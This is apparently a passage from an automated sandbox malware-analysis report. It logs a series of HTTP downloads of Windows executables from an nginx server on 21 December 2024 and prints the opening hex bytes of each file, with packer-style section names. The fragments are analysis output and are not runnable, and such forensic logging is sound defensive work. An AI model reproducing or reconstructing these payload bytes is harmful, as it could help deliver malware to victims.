00 00 00 00 00 00 00 00 00 29 00 00 04 00 00 be fd 28 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 aa 27 00 3c 00 00 00 00 f0 27 00 7d 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 28 00 b8 6a 00 00 00 9c 27 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 9b 27 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 aa a8 26 00 00 10 00 00 00 aa 26 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c f1 00 00 00 c0 26 00 00 f2 00 00 00 ae 26 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 1a 00 00 00 c0 27 00 00 0a 00 00 00 a0 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 70 74 61 62 6c 65 80 00 00 00 00 e0 27 00 00 02 00 00 00 aa 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7d 9e 00 00 00 f0 27 00 00 a0 00 00 00 ac 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b8 6a 00 00 00 90 28 00 00 6c 00 00 00 4c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:16:19 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 09:45:14 GMTConnection: keep-aliveETag: "6761482a-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:16:26 GMTContent-Type: application/octet-streamContent-Length: 22016Last-Modified: Thu, 19 Dec 2024 14:25:14 GMTConnection: keep-aliveETag: "67642cca-5600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 66 0f 37 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4c 00 00 00 08 00 00 00 00 00 00 8e 6a 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 6a 00 00 4f 00 00 00 00 80 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 a8 69 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 4a 00 00 00 20 00 00 00 4c 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 05 00 00 00 80 00 00 00 06 00 00 00 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 6a 00 00 00 00 00 00 48 00 00 00 02 00 05 00 28 37 00 00 80 32 00 00 03 00 02 00 1b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 38 00 00 00 01 00 00 11 73 2f 00 00 06 0a 06 28 16 00 00 0a 7d 20 00 00 04 06 02 7d 21 00 00 04 06 15 7d 1f 00 00 04 06 7c 20 00 00 04 12 00 28 01 00 00 2b 06 7c 20 00 00 04 28 18 00 00 0a 2a 13 30 02 00 50 00 00 00 02 00 00 11 00 7e 02 00 00 04 16 fe 01 0a 06 2c 42 00 72 01 00 00 70 28 19 00 00 0a 00 72 84 00 00 70 28 19 00 00 0a 00 28 05 00 00 06 0b 72 ca 00 00 70 07 28 1a 00 00 0a 28 19 00 00 0a 00 07 28 04 00 00 06 6f 1b 00 00 0a 00 16 28 1c 00 00 0a 00 00 2a 13 30 02 00 38 00 00 00 03 00 00 11 73 32 00 00 06 0a 06 28 16 00 00 0a 7d 28 00 00 04 06 02 7d 29 00 00 04 06 15 7d 27 00 00 04 06 7c 28 00 00 04 12 00 28 02 00 00 2b 06 7c 28 00 00 04 28 18 00 00 0a 2a 13 30 05 00 48 00 00 00 04 00 00 11 00 73 1d 00 00 0a 0a 1a 8d 2f 00 00 01 0b 16 0c 2b 1c 00 07 08 7e 03 00 00 04 06 7e 03 00 00 04 8e 69 6f 1e 00 00 0a 9a a2 00 08 17 58 0c 08 1a fe 04 0d 09 2d dc 72 f0 00 00 70 07 28 1f 00 00 0a 13 04 2b 00 11 04 2a 13 30 02 00 16
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:16:31 GMTContent-Type: application/octet-streamContent-Length: 4419072Last-Modified: Sat, 21 Dec 2024 20:08:15 GMTConnection: keep-aliveETag: "6767202f-436e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 07 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 49 00 00 4c 75 00 00 32 00 00 00 90 c5 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 c0 c5 00 00 04 00 00 67 02 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f b0 72 00 73 00 00 00 00 a0 72 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 79 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 72 00 00 10 00 00 00 34 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 72 00 00 02 00 00 00 44 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 72 00 00 02 00 00 00 46 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 37 00 00 c0 72 00 00 02 00 00 00 48 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 76 79 74 6e 68 75 6b 00 00 1b 00 00 80 aa 00 00 fe 1a 00 00 4a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 75 69 64 78 66 67 68 00 10 00 00 00 80 c5 00 00 04 00 00 00 48 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 c5 00 00 22 00 00 00 4c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:16:43 GMTContent-Type: application/octet-streamContent-Length: 1947648Last-Modified: Sat, 21 Dec 2024 20:51:12 GMTConnection: keep-aliveETag: "67672a40-1db800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 40 01 00 00 00 00 00 00 10 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 40 86 00 00 04 00 00 7c a8 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b 80 41 00 6f 00 00 00 00 d0 40 00 a0 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 8f 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 40 00 00 10 00 00 00 4e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a0 ae 00 00 00 d0 40 00 00 70 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 41 00 00 02 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 90 41 00 00 02 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 71 6f 77 76 66 71 75 00 c0 1a 00 00 40 6b 00 00 be 1a 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 72 62 61 78 6c 76 79 00 10 00 00 00 00 86 00 00 06 00 00 00 90 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 86 00 00 22 00 00 00 96 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:16:52 GMTContent-Type: application/octet-streamContent-Length: 1854464Last-Modified: Sat, 21 Dec 2024 21:06:09 GMTConnection: keep-aliveETag: "67672dc1-1c4c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 49 00 00 04 00 00 27 f3 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 75 6b 6f 63 62 78 79 00 d0 19 00 00 80 2f 00 00 c6 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 67 79 6a 65 65 70 69 00 10 00 00 00 50 49 00 00 06 00 00 00 24 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 49 00 00 22 00 00 00 2a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:17:00 GMTContent-Type: application/octet-streamContent-Length: 2871296Last-Modified: Sat, 21 Dec 2024 21:06:20 GMTConnection: keep-aliveETag: "67672dcc-2bd000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 00 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 4f 00 00 04 00 00 98 80 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 76 78 79 77 66 79 77 00 30 2a 00 00 c0 24 00 00 2e 2a 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 65 67 75 64 66 6f 66 00 10 00 00 00 f0 4e 00 00 04 00 00 00 aa 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4f 00 00 22 00 00 00 ae 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:17:11 GMTContent-Type: application/octet-streamContent-Length: 966656Last-Modified: Sat, 21 Dec 2024 21:03:48 GMTConnection: keep-aliveETag: "67672d34-ec000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 25 2d 67 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 10 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 83 9a 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 9c 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 